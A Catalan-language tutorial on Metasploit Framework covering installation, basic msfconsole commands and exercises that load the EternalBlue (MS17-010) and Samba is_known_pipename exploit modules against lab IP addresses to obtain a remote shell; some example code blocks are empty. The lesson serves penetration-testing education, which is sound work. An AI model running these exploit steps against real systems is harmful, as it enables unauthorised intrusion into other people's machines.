El Metasploit Framework és una eina de codi obert utilitzada per a proves de penetració i investigació de seguretat. Desenvolupada per Rapid7, Metasploit permet als pentesters i investigadors de seguretat identificar, explotar i validar vulnerabilitats en sistemes i aplicacions.

1. Entendre què és Metasploit Framework i per a què s'utilitza.
2. Aprendre a instal·lar i configurar Metasploit.
3. Familiaritzar-se amb les funcionalitats bàsiques de Metasploit.
4. Realitzar un exemple pràctic d'explotació amb Metasploit.

Metasploit Framework és una plataforma que proporciona eines per a la realització de proves de penetració. Inclou una àmplia varietat de mòduls que permeten:

• Escanejar i enumerar serveis.
• Explorar vulnerabilitats.
• Explotar sistemes vulnerables.
• Realitzar post-explotació.

• Modularitat: Metasploit està compost per mòduls que poden ser carregats i utilitzats de manera independent.
• Actualitzacions constants: La comunitat i Rapid7 actualitzen regularment Metasploit amb nous mòduls i funcionalitats.
• Interfície d'usuari: Ofereix tant una interfície de línia de comandes (CLI) com una interfície gràfica (GUI) a través de Metasploit Community.

• Sistema operatiu: Kali Linux (recomanat), Ubuntu, Windows, macOS.
• Privilegis d'administrador.

Kali Linux ve amb Metasploit preinstal·lat. Per assegurar-te que tens la versió més recent, pots actualitzar-lo amb les següents comandes:

Per instal·lar Metasploit en altres sistemes operatius, pots seguir les instruccions oficials a la documentació de Metasploit.

Iniciar Metasploit:

Comandes bàsiques:

• search: Cerca mòduls.

  search type:exploit name:windows
  

• use: Carrega un mòdul específic.

  use exploit/windows/smb/ms17_010_eternalblue
  

• show options: Mostra les opcions configurables del mòdul carregat.

  show options
  

• set: Configura una opció específica.

  set RHOSTS 192.168.1.100
  

• run o exploit: Executa el mòdul carregat.

  run
  

Metasploit Community ofereix una interfície gràfica que facilita la gestió de projectes i la realització de proves de penetració. Pots accedir-hi a través del navegador web després d'instal·lar Metasploit Community.

Explotarem una vulnerabilitat en un sistema Windows 7 utilitzant l'exploit EternalBlue (MS17-010).

Pas 1: Iniciar Metasploit

Pas 2: Cercar l'exploit EternalBlue

Pas 3: Carregar l'exploit

Pas 4: Configurar les opcions necessàries

Pas 5: Executar l'exploit

Si l'explotació és exitosa, obtindrem una sessió de shell en el sistema objectiu.

Realitzar una explotació utilitzant Metasploit per comprometre un sistema vulnerable.

1. Inicia Metasploit amb msfconsole.
2. Cerca un exploit per a una vulnerabilitat coneguda en un sistema Linux.
3. Carrega l'exploit i configura les opcions necessàries.
4. Executa l'exploit i comprova si has obtingut accés al sistema objectiu.

1. Inicia Metasploit:

   msfconsole
   

2. Cerca un exploit:

   search type:exploit platform:linux
   

3. Carrega l'exploit:

   use exploit/linux/samba/is_known_pipename
   

4. Configura les opcions:

   set RHOSTS 192.168.1.101
   set LHOST 192.168.1.50
   

5. Executa l'exploit:

   run
   

• Error: No s'ha pogut connectar a l'objectiu: Assegura't que l'adreça IP de l'objectiu és correcta i que el sistema és accessible.
• Error: L'exploit no ha tingut èxit: Revisa les opcions configurades i assegura't que la vulnerabilitat existeix en el sistema objectiu.
• Consell: Utilitza show options per verificar que totes les opcions necessàries estan configurades correctament abans d'executar l'exploit.

Metasploit Framework és una eina poderosa i versàtil per a proves de penetració. Amb una comprensió bàsica de les seves funcionalitats i una pràctica constant, pots convertir-te en un expert en l'ús de Metasploit per identificar i explotar vulnerabilitats en sistemes i aplicacions.